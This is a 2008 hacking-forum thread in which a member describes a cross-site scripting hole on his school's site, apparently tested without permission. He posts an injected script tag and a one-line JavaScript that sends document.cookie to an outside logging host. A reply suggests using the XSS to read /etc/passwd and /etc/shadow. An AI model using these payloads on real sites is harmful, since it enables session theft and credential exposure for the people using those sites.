Follow us on Twitter!
Few are those who can see with their own eyes and hear with their own hearts. - Albert Einstein
Thursday, April 24, 2014
Navigation
Home
HellBoundHackers Main:
HellBoundHackers Find:
HellBoundHackers Information:
Learn
Communicate
Submit
Shop
Challenges
HellBoundHackers Exploit:
HellBoundHackers Programming:
HellBoundHackers Think:
HellBoundHackers Track:
HellBoundHackers Patch:
HellBoundHackers Other:
HellBoundHackers Need Help?
Other
Members Online
Total Online: 25
Guests Online: 20
Members Online: 5

Registered Members: 82897
Newest Member: salim
Latest Articles
View Thread

HellBound Hackers | Computer General | Hacking in general

Author

Stealing Cookies

chess_rock
Member



Posts: 244
Location:
Joined: 20.02.08
Rank:
Apprentice
Posted on 22-08-08 01:05
Hey there xD

I was trying to check my school's security level, and i found out that it is quite vulnerable to xss cookie stealing. When i'm in my school's pc, i can perfectly steal cookies, but when i do this outside, with a proxy of course, i can't. There is this error saying that i need to be in the network to steal the cookies. My question is more kind of curiosity, since there is nothing about this in google.... Is there any code to camouflage your IP and make you look like the IP of your target? not any proxy, but the same target... or is there any way of trespassing this error message?

i think you'll say nope for the first question, and yep for the second one... almost sure Pfft
Author

RE: Stealing Cookies

spyware
Member



Posts: 4192
Location:
Joined: 14.04.07
Rank:
God
Warn Level: 90
Posted on 22-08-08 01:08
Explain how you are trying to steal cookies.



img507.imageshack.us/img507/3580/spynewsig3il1.png
"The chowner of property." - Zeph
[small]
Widespread intellectual and moral docility may be convenient for leaders in the short term,
but it is suicidal for nations in the long term.
- Carl Sagan
[center]�Since the grid is inescapable, what were the earlier lasers about? Does the corridor have a sense of humor?� - Ebert[/ce

Edited by spyware on 22-08-08 01:09
Author

RE: Stealing Cookies

chess_rock
Member



Posts: 244
Location:
Joined: 20.02.08
Rank:
Apprentice
Posted on 22-08-08 01:13
well... i'm using the following code:

http://www.example.com/search.php?query="><script src=http://www.mypage.com/cookiesteal.js>

the javascript (cookiesteal.js) contains the code:

location.href = 'http://ccl.whiteacid.org/log.php?xxxxxx'+document.cookie;
Author

RE: Stealing Cookies

spyware
Member



Posts: 4192
Location:
Joined: 14.04.07
Rank:
God
Warn Level: 90
Posted on 22-08-08 01:15
How do you get example.com's visitors execute that?



img507.imageshack.us/img507/3580/spynewsig3il1.png
"The chowner of property." - Zeph
[small]
Widespread intellectual and moral docility may be convenient for leaders in the short term,
but it is suicidal for nations in the long term.
- Carl Sagan
[center]�Since the grid is inescapable, what were the earlier lasers about? Does the corridor have a sense of humor?� - Ebert[/ce
Author

RE: Stealing Cookies

chess_rock
Member



Posts: 244
Location:
Joined: 20.02.08
Rank:
Apprentice
Posted on 22-08-08 01:29
well, i tried to do it directly, without sending them to the other page, but then it didn't work... I camouflaged it a bit, and what it does is to send a request to their page to access the code in the javascript...
Author

RE: Stealing Cookies


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 22-08-08 01:44
What he meant is, are you emailing the visitors the link? If you aren't, you are only going to steal your own cookies.

Also, why does the XSS matter? Are the users logging into the site? Are there cookies to steal that would give you access? If there aren't, why bother stealing cookies? You could do so much more because of the XSS. With that you could do AJAX requests for /etc/passwd and /etc/shadow if they have the right permissions. You don't even need to host a script on your own site since you can just use an XSS. That's where you should be focusing if you can't gain more access on the site by using someone else's cookies.
Author

RE: Stealing Cookies

chess_rock
Member



Posts: 244
Location:
Joined: 20.02.08
Rank:
Apprentice
Posted on 22-08-08 02:46
well, yeah... it sounds strange, but i want to steal my OWN cookies... the vulnerabilty is the same in this case as when i try to add info into the website